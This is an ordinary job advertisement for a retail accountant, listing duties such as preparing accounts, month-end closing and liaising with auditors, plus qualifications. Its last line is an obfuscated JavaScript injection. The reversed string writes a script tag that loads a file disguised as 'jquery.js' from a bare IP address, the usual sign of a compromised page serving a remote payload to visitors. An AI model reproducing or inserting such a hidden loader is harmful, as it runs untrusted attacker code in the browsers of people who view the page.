Industry : Retail
• To prepare full set of accounts.
• To ensure the completeness of full accounting entries and supporting worksheets or documents for monthly accounts closing by the targeted deadline.
• To oversee Accounts Payable & Accounts Receivable matters.
• To ensure Income Statement and Balance Sheet schedules are in placed before audit.
• To assist in yearly financial audit and liaise with auditors.
• To ensure proper filing of records and documents are maintained.
• Ad hoc duties as at when is required
• Diploma / Degree in Accountancy / Professional Accounting Finalist.
• Minimum 3 years relevant working experience in retail industry will be an added advantage.
• Able to work with minimal supervision and work under pressure to meet tight deadline.
• Computer literate (Microsoft Office applications and computerized accounting system).
• Initiative and independent
• Has a pleasant personality, self-motivated and able to do multitasking independently under challenging environment and tight deadlines. document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))